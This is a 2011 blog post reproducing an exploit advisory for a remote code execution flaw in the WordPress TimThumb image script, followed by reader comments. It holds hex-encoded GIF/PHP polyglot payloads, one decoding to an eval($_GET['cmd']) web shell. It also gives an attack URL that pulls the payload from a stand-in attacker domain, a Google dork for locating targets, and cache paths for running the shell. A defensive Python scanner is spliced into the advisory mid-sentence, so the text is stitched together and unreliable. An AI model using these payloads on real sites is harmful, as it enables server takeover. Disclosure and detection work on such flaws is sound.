Wednesday, August 3, 2011

WordPress TimThumb Plugin - Remote Code Execution

This plugin has a lot of variants. In the advisory made by MaXe, a temp folder is not found, but I found a lot of themes that include a temp folder that can be exploited this way:

Example: I first crafted a file that contains:

\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x4c\x01\x00\x3b\x3C\x3F\x70\x68\x70\x20\x70\x68\x70\x69\x6E\x66\x6F\x28\x29\x3B\x20\x3F\x3E

Edit: MaXe reported that I have trash in the output because my payload doesn't follow JPEG standards.

(A black dot in a GIF file + phpinfo();)

Here I am uploading the file with the vulnerability:
Cache folder has our file:
Executing the script:
# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
# Date: 3rd August 2011
# Author: MaXe
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.32
# Screenshot: See attachment
# Tested on: Windows XP + Apache + PHP (XAMPP)


WordPress TimThumb (Theme) Plugin - Remote Code Execution


Versions Affected:
1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
(Version 1.33 did not save the cache file as .php)


Info: (See references for original advisory)
TimThumb is an image resizing utility, widely used in many WordPress themes.


External Links:
http://www.binarymoon.co.uk/projects/timthumb/
http://code.google.com/p/timthumb/

Credits:
- Mark Maunder (Original Researcher)
- MaXe (Independent Proof of Concept Writer)


-:: The Advisory ::-
TimThumb is prone to a Remote Code Execution vulnerability, because the
script does not check remotely cached files properly. By crafting a
special image file with a valid MIME-type, and appending a PHP file at
the end of this, it is possible to fool TimThumb into believing that it
is a legitimate image, thus caching it locally in the cache directory.


Attack URL: (Note! Some websites use Base64 Encoding of the src GET-request.)
http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php

Stored file on the Target: (This can change from host to host.)
1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.


Proof of Concept File:
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00

(Transparent GIF +



-:: Solution ::-
Update to the latest version 1.34 or delete the timthumb file.

NOTE: This file is often renamed and you should therefore issue
a command like this in a terminal: (Thanks to rAWjAW for this info.)
find . | grep php | xargs grep -s timthumb
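The two defender checks that follow from the advisory above (finding renamed copies of timthumb.php, and spotting cached "images" that also carry PHP code in a theme's cache or temp directory) are easier to run reliably from a small script than from the one-line find/grep. The following is an added example and is not part of the original post, the advisory, or TimThumb itself. It assumes that a timthumb.php copy contains the string "timthumb" and, optionally, a `define('VERSION', ...)` constant (the version regex is a best-effort assumption, and "unknown" is reported when it does not match), and it treats any directory named `cache` or `temp` as a TimThumb cache directory. The sample tree built by `demo()` is constructed data.

```python
"""Defensive scanner: locate TimThumb copies and image/PHP polyglots in cache dirs."""
import os
import re
import shutil
import sys
import tempfile

# Magic numbers of the image formats TimThumb accepts (GIF, JPEG, PNG).
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n")
# A PHP open tag after an image header means the file is not a plain image.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)
# Assumption: every timthumb.php copy mentions its own name somewhere in the source.
TIMTHUMB_MARKERS = (b"timthumb", b"TimThumb")
# Assumption: a define('VERSION', '1.32') style constant; absent in some builds.
VERSION_RE = re.compile(rb"define\s*\(\s*['\"]VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]")
CACHE_DIR_NAMES = ("cache", "temp")


def is_image_php_polyglot(data: bytes) -> bool:
    """True if data starts with an image magic number and also contains a PHP open tag."""
    if not data.startswith(IMAGE_MAGIC):
        return False
    return PHP_TAG.search(data) is not None


def looks_like_timthumb(source: bytes):
    """Return the version string (or 'unknown') if source looks like timthumb.php, else None."""
    if not any(marker in source for marker in TIMTHUMB_MARKERS):
        return None
    match = VERSION_RE.search(source)
    return match.group(1).decode("ascii", "replace") if match else "unknown"


def scan_tree(root: str) -> dict:
    """Walk root and collect renamed TimThumb copies, .php files in cache dirs, and polyglots."""
    findings = {"timthumb_copies": [], "php_in_cache": [], "polyglot_cache_files": []}
    for dirpath, _dirs, files in os.walk(root):
        in_cache = os.path.basename(dirpath).lower() in CACHE_DIR_NAMES
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(1024 * 1024)  # first MiB is enough for both checks
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if name.lower().endswith(".php"):
                version = looks_like_timthumb(head)
                if version is not None:
                    findings["timthumb_copies"].append((path, version))
                if in_cache:
                    # TimThumb <= 1.32 stored fetched files as .php; a .php in cache is suspect.
                    findings["php_in_cache"].append(path)
            if in_cache and is_image_php_polyglot(head):
                findings["polyglot_cache_files"].append(path)
    return findings


def demo() -> dict:
    """Build a constructed theme tree (sample data, not from any real site) and scan it."""
    root = tempfile.mkdtemp(prefix="tt_scan_")
    try:
        theme = os.path.join(root, "wp-content", "themes", "sample")
        cache = os.path.join(theme, "cache")
        os.makedirs(cache)
        # A renamed TimThumb copy (constructed stand-in for the real script).
        with open(os.path.join(theme, "thumb.php"), "wb") as fh:
            fh.write(b"<?php\n// TimThumb script (constructed sample)\ndefine ('VERSION', '1.32');\n")
        # A cached polyglot: GIF header followed by a harmless PHP tag (constructed).
        with open(os.path.join(cache, "external_" + "0" * 32 + ".php"), "wb") as fh:
            fh.write(b"GIF89a\x01\x00\x01\x00\x00\x00\x00;<?php /* constructed */ ?>")
        # A clean cached image that must not be flagged.
        with open(os.path.join(cache, "clean.gif"), "wb") as fh:
            fh.write(b"GIF89a\x01\x00\x01\x00\x00\x00\x00;")
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    result = scan_tree(target) if target else demo()
    for key, items in result.items():
        print(key, *items, sep="\n  ")
```

Run it as `python scanner.py /path/to/wp-content` to scan a real install; with no argument it scans the constructed sample tree. Any hit in `timthumb_copies` with a version below 1.34 is the update-or-delete case from the Solution section, and any entry in `php_in_cache` or `polyglot_cache_files` is a cached file that should be removed and investigated.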


Disclosure Information:
- Vulnerability Disclosed (Mark Maunder): 1st August 2011
- Vulnerability Researched (MaXe): 2nd August 2011
- Disclosed at The Exploit Database: 3rd August 2011

3 comments:

  1. Hi, can you tell me how you made this proof of concept file and what is \x something something.. and how you used it in PHP. If possible can you mail me the source at anu.returns@gmail.com

  2. The advisory I wrote is not broken, it was extensively tested as shown in the video I also made, along with a blog entry: http://www.exploit-db.com/wordpress-timthumb-exploitation/

    Your GIF file, on the other hand, does not follow the standards completely for GD to process it, hence the reason it becomes broken.

    Also, different versions of TimThumb, process the incoming files differently. Including custom modifications developers may have made, as there was no "temp" directory mentioned, in any of the scripts I tested.

  3. MaXe, first of all it's an honor to have someone from exploit-db commenting on my blog, and I am sorry for the confusion. I modified the blog post. I didn't see that blog entry, so I didn't know there was a lot of different modifications of the plugin.

    Thanks
